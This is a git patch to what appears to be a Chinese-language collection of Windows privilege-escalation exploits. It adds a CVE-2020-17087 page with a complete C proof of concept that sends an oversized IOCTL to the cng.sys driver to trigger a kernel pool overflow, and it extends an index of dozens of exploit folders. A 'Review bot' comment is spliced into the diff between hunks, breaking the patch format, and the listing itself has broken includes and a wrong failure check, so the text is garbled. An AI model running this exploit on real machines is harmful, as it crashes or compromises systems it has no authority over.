From d09c9ad44c6f672921e4545ec99be6551b7fe685 Mon Sep 17 00:00:00 2001
From: Ascotbe <869335729@qq.com>
Date: Thu, 12 Nov 2020 14:16:03 +0800
Subject: [PATCH] Synchronize Microsoft's November patch vulnerability:mag:

---
 CVE-2020-17087/README.md | 111 +++++++++++++++++++++++++++++
 README.md | 146 ++++++++++++++++++++------------------
 2 files changed, 187 insertions(+), 70 deletions(-)
 create mode 100644 CVE-2020-17087/README.md

diff --git a/CVE-2020-17087/README.md b/CVE-2020-17087/README.md
new file mode 100644
index 0000000..e692246
--- /dev/null
+++ b/CVE-2020-17087/README.md
@@ -0,0 +1,111 @@
+## CVE-2020-17087
+
+#### 描述
+
+Windows 内核密码驱动程序 cng.sys 中的特权提升漏洞,已作为 CVE-2020-15999(FreeType 2 库中的缓冲区溢出漏洞)的漏洞链的一部分被广泛利用。CVE-2020-17087 被用于逃脱 Google Chrome浏览器的沙箱,以提升被利用系统的特权,且目前该漏洞已被在野利用。
+
+#### 影响版本
+
+| Product | CPU Architecture | Version | Update | Tested |
+| :------------------ | :--------------- | ------- | ------ | ------ |
+| Windows Server 2019 | | | | |
+| Windows Server 2012 | | R2 | | |
+| Windows Server 2012 | | | | |
+| Windows Server 2008 | X64 | R2 | SP1 | |
+| Windows Server 2008 | X86/X64 | | SP2 | |
+| Windows RT 8.1 | | | | |
+| Windows 8.1 | X86/X64 | | | |
+| Windows 7 | X86/X64 | | SP1 | |
+| Windows Server 2016 | | | | |
+| Windows 10 | X86/X64 | 1607 | | |
+| Windows 10 | | | | |
+| Windows 10 | X86/X64/ARM64 | 20H2 | | |
+| Windows 10 | X86/X64/ARM64 | 2004 | | |
+| Windows 10 | X86/X64/ARM64 | 1903 | | |
+| Windows 10 | X86/X64/ARM64 | 1909 | | |
+| Windows 10 | X86/X64/ARM64 | 1809 | | |
+| Windows 10 | X86/X64/ARM64 | 1803 | | |
+| Windows Server | | 20H2 | | |
+| Windows Server | | 2004 | | |
+| Windows Server | | 1903 | | |
+| Windows Server | | 1909 | | |
+
+#### 修复补丁
+
+```
+https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17087
+```
+
+#### 利用方式
+
+目前没有利用方式,只有一个概念代码
+
+```
+#pragma comment(lib, "ntdll")
+
+#include
+#include
+
+int main() {
+ HANDLE hCng = CreateFileA("\\\\.\\GLOBALROOT\\Device\\Cng",
+ GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
+
+if (hCng == NULL) {
+ printf("[-] Failed to open \\Device\\Cng: %u\n", GetLastError());
+ return 1;
+}
+
+printf("[+] \\Device\\Cng opened, handle: %p\n", hCng);
+
+//
+// DataBufferSize overflows when used for allocating memory in
+// cng!CfgAdtpFormatPropertyBlock as (uint16)(DataBufferSize * 6).
+//
+// In this proof-of-concept, an allocation of (uint16)(0x2AAB * 6) = 2
+// bytes is requested while 0x2AAB * 6 = 0x10002 bytes are written to it.
+//
+CONST DWORD DataBufferSize = 0x2AAB;
+CONST DWORD IoctlSize = 4096 + DataBufferSize;
+BYTE *IoctlData = (BYTE *)HeapAlloc(GetProcessHeap(), 0, IoctlSize);
+
+RtlZeroMemory(IoctlData, IoctlSize);
+
+*(DWORD*) &IoctlData[0x00] = 0x1A2B3C4D;
+*(DWORD*) &IoctlData[0x04] = 0x10400;
+*(DWORD*) &IoctlData[0x08] = 1;
+*(ULONGLONG*)&IoctlData[0x10] = 0x100;
+*(DWORD*) &IoctlData[0x18] = 3;
+*(ULONGLONG*)&IoctlData[0x20] = 0x200;
+*(ULONGLONG*)&IoctlData[0x28] = 0x300;
+*(ULONGLONG*)&IoctlData[0x30] = 0x400;
+*(DWORD*) &IoctlData[0x38] = 0;
+*(ULONGLONG*)&IoctlData[0x40] = 0x500;
+*(ULONGLONG*)&IoctlData[0x48] = 0x600;
+*(DWORD*) &IoctlData[0x50] = DataBufferSize; // OVERFLOW
+*(ULONGLONG*)&IoctlData[0x58] = 0x1000;
+*(ULONGLONG*)&IoctlData[0x60] = 0;
+RtlCopyMemory(&IoctlData[0x200], L"FUNCTION", 0x12);
+RtlCopyMemory(&IoctlData[0x400], L"PROPERTY", 0x12);
+
+ULONG_PTR OutputBuffer = 0;
+DWORD BytesReturned;
+BOOL Status = DeviceIoControl(
+ hCng,
+ 0x390400,
+ IoctlData,
+ IoctlSize,
+ &OutputBuffer,
+ sizeof(OutputBuffer),
+ &BytesReturned,
+ NULL
+);
+
+printf("[+] Ioctl sent, Status: %d, OutputBuffer: %zx\n", Status, OutputBuffer);
+
+HeapFree(GetProcessHeap(), 0, IoctlData);
+CloseHandle(hCng);
+
+return 0;
+}
+```
+
diff --git a/README.md b/README.md
index 11c07f3..1736543 100644
--- a/README.md
+++ b/README.md
@@ -13,12 +13,17 @@ 该项目是一个Windows提权搜集项目,除未通过测试EXP都有详细说明以及演示GIF图,如果项目中的代码有您的代码,本人为标注来源的请提交Issues
+> 提示
+
+本项目优先追踪内核相关提权漏洞,如果当月漏洞存在远程命令执行的话,只有在互联网生存在EXP或者POC的时候才会更新,如有遗漏欢迎提Issues并带上利用代码
+
 > 未测试成功编号
 下列编号都是在筛选后未能通过复现测试的CVE,附带未成功原因,欢迎提交PR
 | SecurityBulletin | Remarks |
 | ---------------- | -------------------------------------------------- |
+| CVE-2020-17087 | 2020年11月补丁,只有概念验证,无利用代码 |
 | CVE-2015-0002 | 有源码未能测试成功 |
 | CVE-2015-0062 | 有源码和EXP未能测试成功 |
 | CVE-2015-1725 | 有源码未知编译方式 |
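Review bot: The proof-of-concept's failure check `if (hCng == NULL) {` tests the wrong sentinel: `CreateFileA` reports failure with `INVALID_HANDLE_VALUE`, not `NULL`, so when `\Device\Cng` cannot be opened the program prints the "opened" line and passes an invalid handle to `DeviceIoControl`; the guard should read `if (hCng == INVALID_HANDLE_VALUE) {`. The two `#include` directives at the top of the listing have lost their targets (presumably `<Windows.h>` and `<stdio.h>`, swallowed as HTML tags when the markdown was rendered), so the snippet does not compile as pasted; write them as `#include <Windows.h>` and `#include <stdio.h>` or escape the angle brackets. The README should also warn above the listing that, per the code's own comment, the IOCTL writes 0x10002 bytes into a 2-byte pool allocation, so running it on an unpatched host is expected to bugcheck the kernel rather than elevate privileges — e.g. `> Note: this PoC triggers a kernel pool overflow and will crash the machine; run it only in an isolated test VM.` The `HeapAlloc` result is also used without a NULL check, though for a crash-only PoC that is minor.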
@@ -40,76 +45,77 @@ ### 编号列表
-| SecurityBulletin | Description | OperatingSystem |
-| :--------------------------------- | :----------------------------------------------------------: | :----------------------------------------: |
-| [CVE-2020-16938](./CVE-2020-16938) | Windows Kernel Information Disclosure Vulnerability | Windows 2004 |
-| [CVE-2020-16898](./CVE-2020-16898) | Windows TCP/IP Remote Code Execution Vulnerability | Windows 10/2019/1903/1909/2004 |
-| [CVE-2020-1472](./CVE-2020-1472) | Netlogon Elevation of Privilege | Windows 2008/2012/2016/2019/1903/1909/2004 |
-| [CVE-2020-0796](./CVE-2020-0796) | SMBv3 Remote Code Execution | Windows 1903/1909 |
-| [CVE-2020-0787](./CVE-2020-0787) | Windows Background Intelligent Transfer Service | Windows 7/8/10/2008/2012/2016/2019 |
-| [CVE-2019-1458](./CVE-2019-1458) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016 |
-| [CVE-2019-1388](./CVE-2019-1388) | Windows Certificate Dialog Elevation of Privilege | Windows 7/8/2008/2012/2016/2019 |
-| [CVE-2019-0859](./CVE-2019-0859) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 |
-| [CVE-2019-0803](./CVE-2019-0803) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 |
-| [CVE-2018-8639](./CVE-2018-8639) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 |
-| [CVE-2018-8453](./CVE-2018-8453) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 |
-| [CVE-2018-8440](./CVE-2018-8440) | Windows ALPC Elevation of Privilege | Windows 7/8/10/2008/2012/2016 |
-| [CVE-2018-8120](./CVE-2018-8120) | Win32k Elevation of Privilege | Windows 7/2008 |
-| [CVE-2018-1038](./CVE-2018-1038) | Windows Kernel Elevation of Privilege | Windows 7/2008 |
-| [CVE-2018-0743](./CVE-2018-0743) | Windows Subsystem for Linux Elevation of Privilege | Windows 10/2016 |
-| [CVE-2018-0833](./CVE-2018-0833) | SMBv3 Null Pointer Dereference Denial of Service | Windows 8/2012 |
-| [CVE-2017-8464](./CVE-2017-8464) | LNK Remote Code Execution | Windows 7/8/10/2008/2012/2016 |
-| [CVE-2017-0213](./CVE-2017-0213) | Windows COM Elevation of Privilege | Windows 7/8/10/2008/2012/2016 |
-| [CVE-2017-0143](./CVE-2017-0143) | Windows Kernel Mode Drivers | Windows 7/8/10/2008/2012/2016/Vista |
-| [CVE-2017-0101](./CVE-2017-0101) | GDI Palette Objects Local Privilege Escalation | Windows 7/8/10/2008/2012/Vista |
-| [CVE-2016-7255](./CVE-2016-7255) | Windows Kernel Mode Drivers | Windows 7/8/10/2008/2012/2016/Vista |
-| [CVE-2016-3371](./CVE-2016-3371) | Windows Kernel Elevation of Privilege | Windows 7/8/10/2008/2012/Vista |
-| [CVE-2016-3309](./CVE-2016-3309) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/Vista |
-| [CVE-2016-3225](./CVE-2016-3225) | Windows SMB Server Elevation of Privilege | Windows 7/8/10/2008/2012/Vista |
-| [CVE-2016-0099](./CVE-2016-0099) | Secondary Logon Handle | Windows 7/8/10/2008/2012/Vista |
-| [CVE-2016-0095](./CVE-2016-0095) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/Vista |
-| [CVE-2016-0051](./CVE-2016-0051) | WebDAV Elevation of Privilege | Windows 7/8/10/2008/2012/Vista |
-| [CVE-2016-0041](./CVE-2016-0041) | Win32k Memory Corruption Elevation of Privilege | Windows 7/8/10/2008/2012/Vista |
-| [CVE-2015-2546](./CVE-2015-2546) | Win32k Memory Corruption Elevation of Privilege | Windows 7/8/10/2008/2012/Vista |
-| [CVE-2015-2387](./CVE-2015-2387) | ATMFD.DLL Memory Corruption | Windows 7/8/2003/2008/2012/Vista/Rt |
-| [CVE-2015-2370](./CVE-2015-2370) | Windows RPC Elevation of Privilege | Windows 7/8/10/2003/2008/2012/Vista |
-| [CVE-2015-1725](./CVE-2015-1725) | Win32k Elevation of Privilege | Windows 7/8/10/2003/2008/2012/Vista |
-| [CVE-2015-1701](./CVE-2015-1701) | Windows Kernel Mode Drivers | Windows 7/2003/2008/Vista |
-| [CVE-2015-0062](./CVE-2015-0062) | Windows Create Process Elevation of Privilege | Windows 7/8/2008/2012 |
-| [CVE-2015-0057](./CVE-2015-0057) | Win32k Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista |
-| [CVE-2015-0003](./CVE-2015-0003) | Win32k Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista |
-| [CVE-2015-0002](./CVE-2015-0002) | Microsoft Application Compatibility Infrastructure Elevation of Privilege | Windows 7/8/2003/2008/2012 |
-| [CVE-2014-6324](./CVE-2014-6324) | Kerberos Checksum Vulnerability | Windows 7/8/2003/2008/2012/Vista |
-| [CVE-2014-6321](./CVE-2014-6321) | Microsoft Schannel Remote Code Execution | Windows 7/8/2003/2008/2012/Vista |
-| [CVE-2014-4113](./CVE-2014-4113) | Win32k.sys Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista |
-| [CVE-2014-4076](./CVE-2014-4076) | TCP/IP Elevation of Privilege | Windows 2003 |
-| [CVE-2014-1767](./CVE-2014-1767) | Ancillary Function Driver Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista |
-| [CVE-2013-5065](./CVE-2013-5065) | NDProxy.sys | Windows XP/2003 |
-| [CVE-2013-1345](./CVE-2013-1345) | Kernel Driver | Windows 7/8/2003/2008/2012/Vista/Rt/Xp |
-| [CVE-2013-1332](./CVE-2013-1332) | DirectX Graphics Kernel Subsystem Double Fetch | Windows 7/8/2003/2008/2012/Vista/Rt |
-| [CVE-2013-0008](./CVE-2013-0008) | Win32k Improper Message Handling | Windows 7/8/2008/2012/Vista/Rt |
-| [CVE-2012-0217](./CVE-2012-0217) | Service Bus | Windows 7/2003/2008/Xp |
-| [CVE-2012-0002](./CVE-2012-0002) | Remote Desktop Protocol | Windows 7/2003/2008/Vista/Xp |
-| [CVE-2011-2005](./CVE-2011-2005) | Ancillary Function Driver Elevation of Privilege | Windows 2003/Xp |
-| [CVE-2011-1974](./CVE-2011-1974) | NDISTAPI Elevation of Privilege | Windows 2003/Xp |
-| [CVE-2011-1249](./CVE-2011-1249) | Ancillary Function Driver Elevation of Privilege | Windows 7/2003/2008/Vista/Xp |
-| [CVE-2011-0045](./CVE-2011-0045) | Windows Kernel Integer Truncation | Windows Xp |
-| [CVE-2010-4398](./CVE-2010-4398) | Driver Improper Interaction with Windows Kernel | Windows 7/2003/2008/Vista/Xp |
-| [CVE-2010-3338](./CVE-2010-3338) | Task Scheduler | Windows 7/2008/Vista |
-| [CVE-2010-2554](./CVE-2010-2554) | Tracing Registry Key ACL | Windows 7/2008/Vista |
-| [CVE-2010-1897](./CVE-2010-1897) | Win32k Window Creation | Windows 7/2003/2008/Vista/Xp |
-| [CVE-2010-0270](./CVE-2010-0270) | SMB Client Transaction | Windows 7/2008 |
-| [CVE-2010-0233](./CVE-2010-0233) | Windows Kernel Double Free | Windows 2000/2003/2008/Vista/Xp |
-| [CVE-2010-0020](./CVE-2010-0020) | SMB Pathname Overflow | Windows 7/2000/2003/2008/Vista/Xp |
-| [CVE-2009-2532](./CVE-2009-2532) | SMBv2 Command Value | Windows 2008/Vista |
-| [CVE-2009-0079](./CVE-2009-0079) | Windows RPCSS Service Isolation | Windows 2003/Xp |
-| [CVE-2008-4250](./CVE-2008-4250) | Server Service | Windows 2000/2003/Vista/Xp |
-| [CVE-2008-4037](./CVE-2008-4037) | SMB Credential Reflection | Windows 2000/2003/2008/Vista/Xp |
-| [CVE-2008-3464](./CVE-2008-3464) | AFD Kernel Overwrite | Windows 2003/Xp |
-| [CVE-2008-1084](./CVE-2008-1084) | Win32.sys | Windows 2000/2003/2008/Vista/Xp |
-| [CVE-2006-3439](./CVE-2006-3439) | Remote Code Execution | Windows 2000/2003/Xp |
-| [CVE-2005-1983](./CVE-2005-1983) | PnP Service | Windows 2000/Xp |
-| [CVE-2003-0352](./CVE-2003-0352) | Buffer Overrun In RPC Interface | Windows 2000/2003/Xp/Nt |
+| SecurityBulletin | Description | OperatingSystem |
+| :--------------------------------- | :----------------------------------------------------------: | :------------------------------------------------------: |
+| [CVE-2020-17087](./CVE-2020-17087) | Windows Kernel Local Elevation of Privilege Vulnerability | Windows 7/8.1/10/2008/2012/2016/2019/20H2/2004/1903/1909 |
+| [CVE-2020-16938](./CVE-2020-16938) | Windows Kernel Information Disclosure Vulnerability | Windows 2004 |
+| [CVE-2020-16898](./CVE-2020-16898) | Windows TCP/IP Remote Code Execution Vulnerability | Windows 10/2019/1903/1909/2004 |
+| [CVE-2020-1472](./CVE-2020-1472) | Netlogon Elevation of Privilege | Windows 2008/2012/2016/2019/1903/1909/2004 |
+| [CVE-2020-0796](./CVE-2020-0796) | SMBv3 Remote Code Execution | Windows 1903/1909 |
+| [CVE-2020-0787](./CVE-2020-0787) | Windows Background Intelligent Transfer Service | Windows 7/8/10/2008/2012/2016/2019 |
+| [CVE-2019-1458](./CVE-2019-1458) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016 |
+| [CVE-2019-1388](./CVE-2019-1388) | Windows Certificate Dialog Elevation of Privilege | Windows 7/8/2008/2012/2016/2019 |
+| [CVE-2019-0859](./CVE-2019-0859) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 |
+| [CVE-2019-0803](./CVE-2019-0803) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 |
+| [CVE-2018-8639](./CVE-2018-8639) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 |
+| [CVE-2018-8453](./CVE-2018-8453) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 |
+| [CVE-2018-8440](./CVE-2018-8440) | Windows ALPC Elevation of Privilege | Windows 7/8/10/2008/2012/2016 |
+| [CVE-2018-8120](./CVE-2018-8120) | Win32k Elevation of Privilege | Windows 7/2008 |
+| [CVE-2018-1038](./CVE-2018-1038) | Windows Kernel Elevation of Privilege | Windows 7/2008 |
+| [CVE-2018-0743](./CVE-2018-0743) | Windows Subsystem for Linux Elevation of Privilege | Windows 10/2016 |
+| [CVE-2018-0833](./CVE-2018-0833) | SMBv3 Null Pointer Dereference Denial of Service | Windows 8/2012 |
+| [CVE-2017-8464](./CVE-2017-8464) | LNK Remote Code Execution | Windows 7/8/10/2008/2012/2016 |
+| [CVE-2017-0213](./CVE-2017-0213) | Windows COM Elevation of Privilege | Windows 7/8/10/2008/2012/2016 |
+| [CVE-2017-0143](./CVE-2017-0143) | Windows Kernel Mode Drivers | Windows 7/8/10/2008/2012/2016/Vista |
+| [CVE-2017-0101](./CVE-2017-0101) | GDI Palette Objects Local Privilege Escalation | Windows 7/8/10/2008/2012/Vista |
+| [CVE-2016-7255](./CVE-2016-7255) | Windows Kernel Mode Drivers | Windows 7/8/10/2008/2012/2016/Vista |
+| [CVE-2016-3371](./CVE-2016-3371) | Windows Kernel Elevation of Privilege | Windows 7/8/10/2008/2012/Vista |
+| [CVE-2016-3309](./CVE-2016-3309) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/Vista |
+| [CVE-2016-3225](./CVE-2016-3225) | Windows SMB Server Elevation of Privilege | Windows 7/8/10/2008/2012/Vista |
+| [CVE-2016-0099](./CVE-2016-0099) | Secondary Logon Handle | Windows 7/8/10/2008/2012/Vista |
+| [CVE-2016-0095](./CVE-2016-0095) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/Vista |
+| [CVE-2016-0051](./CVE-2016-0051) | WebDAV Elevation of Privilege | Windows 7/8/10/2008/2012/Vista |
+| [CVE-2016-0041](./CVE-2016-0041) | Win32k Memory Corruption Elevation of Privilege | Windows 7/8/10/2008/2012/Vista |
+| [CVE-2015-2546](./CVE-2015-2546) | Win32k Memory Corruption Elevation of Privilege | Windows 7/8/10/2008/2012/Vista |
+| [CVE-2015-2387](./CVE-2015-2387) | ATMFD.DLL Memory Corruption | Windows 7/8/2003/2008/2012/Vista/Rt |
+| [CVE-2015-2370](./CVE-2015-2370) | Windows RPC Elevation of Privilege | Windows 7/8/10/2003/2008/2012/Vista |
+| [CVE-2015-1725](./CVE-2015-1725) | Win32k Elevation of Privilege | Windows 7/8/10/2003/2008/2012/Vista |
+| [CVE-2015-1701](./CVE-2015-1701) | Windows Kernel Mode Drivers | Windows 7/2003/2008/Vista |
+| [CVE-2015-0062](./CVE-2015-0062) | Windows Create Process Elevation of Privilege | Windows 7/8/2008/2012 |
+| [CVE-2015-0057](./CVE-2015-0057) | Win32k Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista |
+| [CVE-2015-0003](./CVE-2015-0003) | Win32k Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista |
+| [CVE-2015-0002](./CVE-2015-0002) | Microsoft Application Compatibility Infrastructure Elevation of Privilege | Windows 7/8/2003/2008/2012 |
+| [CVE-2014-6324](./CVE-2014-6324) | Kerberos Checksum Vulnerability | Windows 7/8/2003/2008/2012/Vista |
+| [CVE-2014-6321](./CVE-2014-6321) | Microsoft Schannel Remote Code Execution | Windows 7/8/2003/2008/2012/Vista |
+| [CVE-2014-4113](./CVE-2014-4113) | Win32k.sys Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista |
+| [CVE-2014-4076](./CVE-2014-4076) | TCP/IP Elevation of Privilege | Windows 2003 |
+| [CVE-2014-1767](./CVE-2014-1767) | Ancillary Function Driver Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista |
+| [CVE-2013-5065](./CVE-2013-5065) | NDProxy.sys | Windows XP/2003 |
+| [CVE-2013-1345](./CVE-2013-1345) | Kernel Driver | Windows 7/8/2003/2008/2012/Vista/Rt/Xp |
+| [CVE-2013-1332](./CVE-2013-1332) | DirectX Graphics Kernel Subsystem Double Fetch | Windows 7/8/2003/2008/2012/Vista/Rt |
+| [CVE-2013-0008](./CVE-2013-0008) | Win32k Improper Message Handling | Windows 7/8/2008/2012/Vista/Rt |
+| [CVE-2012-0217](./CVE-2012-0217) | Service Bus | Windows 7/2003/2008/Xp |
+| [CVE-2012-0002](./CVE-2012-0002) | Remote Desktop Protocol | Windows 7/2003/2008/Vista/Xp |
+| [CVE-2011-2005](./CVE-2011-2005) | Ancillary Function Driver Elevation of Privilege | Windows 2003/Xp |
+| [CVE-2011-1974](./CVE-2011-1974) | NDISTAPI Elevation of Privilege | Windows 2003/Xp |
+| [CVE-2011-1249](./CVE-2011-1249) | Ancillary Function Driver Elevation of Privilege | Windows 7/2003/2008/Vista/Xp |
+| [CVE-2011-0045](./CVE-2011-0045) | Windows Kernel Integer Truncation | Windows Xp |
+| [CVE-2010-4398](./CVE-2010-4398) | Driver Improper Interaction with Windows Kernel | Windows 7/2003/2008/Vista/Xp |
+| [CVE-2010-3338](./CVE-2010-3338) | Task Scheduler | Windows 7/2008/Vista |
+| [CVE-2010-2554](./CVE-2010-2554) | Tracing Registry Key ACL | Windows 7/2008/Vista |
+| [CVE-2010-1897](./CVE-2010-1897) | Win32k Window Creation | Windows 7/2003/2008/Vista/Xp |
+| [CVE-2010-0270](./CVE-2010-0270) | SMB Client Transaction | Windows 7/2008 |
+| [CVE-2010-0233](./CVE-2010-0233) | Windows Kernel Double Free | Windows 2000/2003/2008/Vista/Xp |
+| [CVE-2010-0020](./CVE-2010-0020) | SMB Pathname Overflow | Windows 7/2000/2003/2008/Vista/Xp |
+| [CVE-2009-2532](./CVE-2009-2532) | SMBv2 Command Value | Windows 2008/Vista |
+| [CVE-2009-0079](./CVE-2009-0079) | Windows RPCSS Service Isolation | Windows 2003/Xp |
+| [CVE-2008-4250](./CVE-2008-4250) | Server Service | Windows 2000/2003/Vista/Xp |
+| [CVE-2008-4037](./CVE-2008-4037) | SMB Credential Reflection | Windows 2000/2003/2008/Vista/Xp |
+| [CVE-2008-3464](./CVE-2008-3464) | AFD Kernel Overwrite | Windows 2003/Xp |
+| [CVE-2008-1084](./CVE-2008-1084) | Win32.sys | Windows 2000/2003/2008/Vista/Xp |
+| [CVE-2006-3439](./CVE-2006-3439) | Remote Code Execution | Windows 2000/2003/Xp |
+| [CVE-2005-1983](./CVE-2005-1983) | PnP Service | Windows 2000/Xp |
+| [CVE-2003-0352](./CVE-2003-0352) | Buffer Overrun In RPC Interface | Windows 2000/2003/Xp/Nt |